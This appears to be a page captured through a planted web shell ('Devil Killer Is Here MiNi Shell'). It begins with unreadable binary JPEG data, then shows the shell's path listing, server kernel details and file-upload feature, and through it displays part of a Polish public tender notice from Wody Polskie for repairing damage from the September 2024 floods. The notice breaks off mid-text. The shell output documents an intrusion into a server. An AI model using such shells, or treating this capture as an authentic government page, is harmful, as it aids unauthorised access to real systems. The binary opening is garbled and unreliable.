JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250514/0022985501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Usuwanie szkód powodziowych - skutków powodzi z września 2024 r.-obszar nadzoru Wodnego Bielsko-Biała-gm. Bestwina, Brzeszcze, Czechowice-Dziedzice, Jasienica, Wilkowice – części od 1 do 5 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Wodne Wody Polskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 368302575</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żelazna 59a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-848</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 777 49 50</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.gliwice@wody.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/wody-polskie</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usuwanie szkód powodziowych - skutków powodzi z września 2024 r.-obszar nadzoru Wodnego Bielsko-Biała-gm. Bestwina, Brzeszcze, Czechowice-Dziedzice, Jasienica, Wilkowice – części od 1 do 5 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cc20023f-b1db-4eee-96c8-ecd0754545aa</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00229855</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00112251/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.268 Usuwanie szkód powodziowych - skutków powodzi z września 2024 r.-obszar nadzoru Wodnego Bielsko-Biała-gm. Bestwina, Brzeszcze, Czechowice-Dziedzice, Jasienica, Wilkowice</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.wody.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://przetargi.wody.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3.1	Zgodnie z art. 61 ust. 1 ustawy Pzp, z zastrzeżeniem wyjątków, o których mowa w niniejszej specyfikacji warunków zamówienia – zwanej dalej „SWZ” – komunikacja między Zamawiającym a Wykonawcami odbywa się w formie elektronicznej, za pośrednictwem Platformy Zakupowej – zwanej dalej „Platformą” – pod adresem: https://przetargi.wody.gov.pl/.<br/>3.2	Korzystanie z Platformy jest nieodpłatne. Instrukcja korzystania z Platformy znajduje się pod adresem przetargi.wody.gov.pl w zakładce: Instrukcja dla Wykonawców.<br/>3.3	Korzystanie z Platformy nie wymaga zarejestrowania konta na Platformie. <br/>3.4	Dokumenty związane z postępowaniem Zamawiający zamieszcza na Platformie <br/>w zakładce z przedmiotowym postępowaniem.<br/>3.5	Celem skomunikowania się z Zamawiającym (z wyłączeniem złożenia oferty oraz dokumentów lub oświadczeń składanych razem z ofertą, których sposób złożenia został opisany w pkt 14.1 – 14.6 specyfikacji warunków zamówienia, zwanej dalej SWZ”), Wykonawca korzysta z zakładki „Zapytaj”. Zakładka ta służy również Zamawiającemu do komunikacji z Wykonawcami.<br/>3.6	Za datę wpływu wszelkiej korespondencji do Zamawiającego, w tym złożenia oferty oraz dokumentów lub oświadczeń składanych razem z ofertą, uważa się datę wczytania korespondencji na Platformie.<br/>3.7	Zamawiający zaleca sporządzenie korespondencji w następujących formatach: .doc., .docx, .rtf, .pdf, .xls.<br/>3.8	Zamawiający informuje, że adres e-mail wskazany w ogłoszeniu o zamówieniu, służy jedynie do przesyłania ogłoszeń i otrzymywania informacji zwrotnej z Biuletynu Zamówień Publicznych. Nie jest to adres do komunikacji <br/>z Wykonawcami.<br/>3.9	Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy wynosi 150 MB.<br/>3.10	Dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowania dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem Platformy jako załączniki. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub cyfrowych odwzorowań dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów dnia 30 grudnia 2020 r. <br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. <br/>w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.4	Informacja dotycząca przetwarzania danych osobowych. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 <br/>z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>a)	administratorem Pani/Pana danych osobowych jest Państwowe Gospodarstwo Wodne Wody Polskie z siedzibą w Warszawie przy ul. Żelaznej 59A, <br/>00-848 Warszawa, REGON: 368302575, NIP: 527-282-56-16;<br/>b)	kontakt z Inspektorem ochrony danych w PGW WP możliwy jest pod adresem <br/>e-mail: iod@wody.gov.pl;<br/>c)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego oznaczonego numerem postępowania C.ROZ.2710.70.2025.APS prowadzonym na podstawie przepisów ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>d)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz <br/>art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>e)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy <br/>z dnia 11 września 2019 r. Prawo zamówień publicznych, przez okres 4 lat licząc od końca roku kalendarzowego, w którym zakończono postępowanie o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>f)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy z dnia <br/>11 września 2019 r. Prawo zamówień publicznych, związanym z udziałem <br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>g)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO<br/>h)	posiada Pani/Pan:<br/>	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>	na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym <br/>z przepisami ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO<br/>i)	nie przysługuje Państwu:<br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">C.ROZ.2710.70.2025.APS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 7212608,02 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 - Likwidacja wyrw w skarpach odwodnych wałów przeciwpowodziowych cieku Kanału Ligockiego w miejscowości Ligota gm. Czechowice-Dziedzice.<br/><br/>Zakres robót obejmuje:<br/>•	pełnienie nadzoru przyrodniczego<br/>•	wykoszenie porostów ze skarp (obiekt porośnięty rdestowcem sachalińskim) z wygrabieniem<br/>•	rozbiórka ubezpieczeń z płyt ażurowych<br/>•	zakup ziemi<br/>•	roboty ziemne<br/>•	wzmocnienie podłoża pod narzut kamienny geowłókniną wzmocnioną 200g/m2<br/>•	zabudowa wyrw narzutem licowanym kamiennym z głazów 50-80cm, klinowanym mechanicznie<br/>•	wykonanie opasek z połowizn żerdzi<br/>•	zabicie palisady asekuracyjnej <br/>•	wykonanie ubezpieczeń z płyt ażurowych<br/>•	plantowanie i obsiew skarp </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 284064,76 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">15.1.	Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu.<br/>15.2.	Oferty oceniane będą na podstawie następujących kryteriów:<br/>15.2.1.	cena brutto – waga 60%<br/>15.2.2.	termin wykonania – waga 40%<br/>15.3.	Ocena ofert zostanie dokonana wg poniższego wzoru:<br/>P = Pc + Pt<br/>gdzie: <br/>P – łączna liczba punktów przyznanych badanej ofercie, <br/>Pc – liczba punktów w kryterium „cena brutto”,<br/>Pt – liczba punktów w kryterium „termin wykonania”.<br/>15.4.	Ocena w poszczególnych kryteriach dokonywana będzie na poniższych zasadach:<br/>15.4.1.	Każda z ważnych ofert będzie punktowana w kryterium określonym <br/>w pkt 15.2.1 SWZ poprzez porównanie ceny brutto oferty badanej do ceny brutto najniższej ze wszystkich ważnych ofert, wg poniższego wzoru:<br/>Pc = (Cn : Cb) x 60<br/>gdzie: <br/>Cn – cena brutto najniższa spośród wszystkich ofert podlegających ocenie,<br/>Cb – cena brutto oferty badanej.<br/>15.4.2.	Każda z ważnych ofert będzie punktowana w kryterium określonym <br/>w pkt 15.2.2 SWZ poprzez przyznanie punktów za zaoferowany termin wykonania w następujący sposób:<br/><br/>Dla części nr 1:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania : do 30 dni 40<br/>2	Termin wykonania: do 35 dni 20<br/>3	Termin wykonania: do 40 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>40 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>Dla części nr 2:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania: do 20 dni 40<br/>2 Termin wykonania: do 25 dni 20<br/>3 Termin wykonania: do 30 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>30 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>Dla części nr 3:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1 Termin wykonania: do 150 dni 40<br/>2 Termin wykonania: do 155 dni 20<br/>3 Termin wykonania: do 160 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>160 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>Dla części nr 4:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1 Termin wykonania: do 100 dni 40<br/>2 Termin wykonania: do 105 dni 20<br/>3 Termin wykonania: do 110 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>110 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>Dla części nr 5:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1 Termin wykonania: do 150 dni 40<br/>2 Termin wykonania: do 155 dni 20<br/>3 Termin wykonania: do 160 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>160 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>15.5.	Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w SWZ. Za najkorzystniejszą zostanie uznana oferta, która łącznie (suma punktów przyznanych we wszystkich kryteriach oceny ofert) uzyska największą liczbę punktów obliczonych zgodnie z wzorem określonym w pkt 15.3 SWZ. <br/>15.6.	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 - Naprawa zabezpieczeń i likwidacji wyrw brzegowo-dennych c. Leśny w rejonie ul. Cmentarnej w Wilkowicach.<br/><br/>Zakres robót przewidzianych do przeprowadzenia ograniczać się będzie do robót w zakresie ochrony przeciwpowodziowej mających na celu naprawę ubezpieczeń i likwidację wyrw brzegowo-dennych. <br/>Planowane prace do wykonania:<br/>•	ręczne ścinanie krzaków poszycia średniej gęstości wraz z mechanicznym rozdrobnieniem gałęzi i wywozem zrąbków<br/>•	mechaniczne roboty ziemne<br/>•	formowanie i zagęszczanie spycharkami gąsienicowymi nasypów, <br/>•	wykonanie grodzy w celu podziału koryta<br/>•	instalacja, pompowanie i demontaż pompy w wykopie<br/>•	roboty pomiarowe<br/>•	wykopy oraz przekopy wykonane koparkami podsiębiernymi - kształtowanie przekroju poprzecznego koryta cieku w miejscu zabudowy opaski z narzutu kamiennego<br/>•	mechaniczne zasypywanie wnęk za ścianami budowli inżynieryjnych <br/>•	zakup ziemi wraz z transportem<br/>•	formowanie i zagęszczanie nasypów wraz z plantowaniem powierzchni<br/>•	wzmacnianie podłoża geowłóknina wzmocnioną pod opaskę z narzutu kamiennego sposobem ręcznym<br/>•	wykonanie podsypek z pospółki<br/>•	wykonanie opaski z narzutu kamiennego licowanego, wykonanie narzutu kamiennego w dnie <br/>wraz ze spoinowaniem<br/>•	wykonanie progów i gurtów drewnianych w dnie, wbijanie kołków oporowych oraz wykonanie palisady<br/>•	humusowanie skarp wraz z sadzeniem żywokołów<br/>•	profilowanie i zagęszczanie mechaniczne podłoża wraz z usunięciem kolein z nawierzchnią z tłucznia kamiennego </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 109744,47 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">15.1.	Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu.<br/>15.2.	Oferty oceniane będą na podstawie następujących kryteriów:<br/>15.2.1.	cena brutto – waga 60%<br/>15.2.2.	termin wykonania – waga 40%<br/>15.3.	Ocena ofert zostanie dokonana wg poniższego wzoru:<br/>P = Pc + Pt<br/>gdzie: <br/>P – łączna liczba punktów przyznanych badanej ofercie, <br/>Pc – liczba punktów w kryterium „cena brutto”,<br/>Pt – liczba punktów w kryterium „termin wykonania”.<br/>15.4.	Ocena w poszczególnych kryteriach dokonywana będzie na poniższych zasadach:<br/>15.4.1.	Każda z ważnych ofert będzie punktowana w kryterium określonym <br/>w pkt 15.2.1 SWZ poprzez porównanie ceny brutto oferty badanej do ceny brutto najniższej ze wszystkich ważnych ofert, wg poniższego wzoru:<br/>Pc = (Cn : Cb) x 60<br/>gdzie: <br/>Cn – cena brutto najniższa spośród wszystkich ofert podlegających ocenie,<br/>Cb – cena brutto oferty badanej.<br/>15.4.2.	Każda z ważnych ofert będzie punktowana w 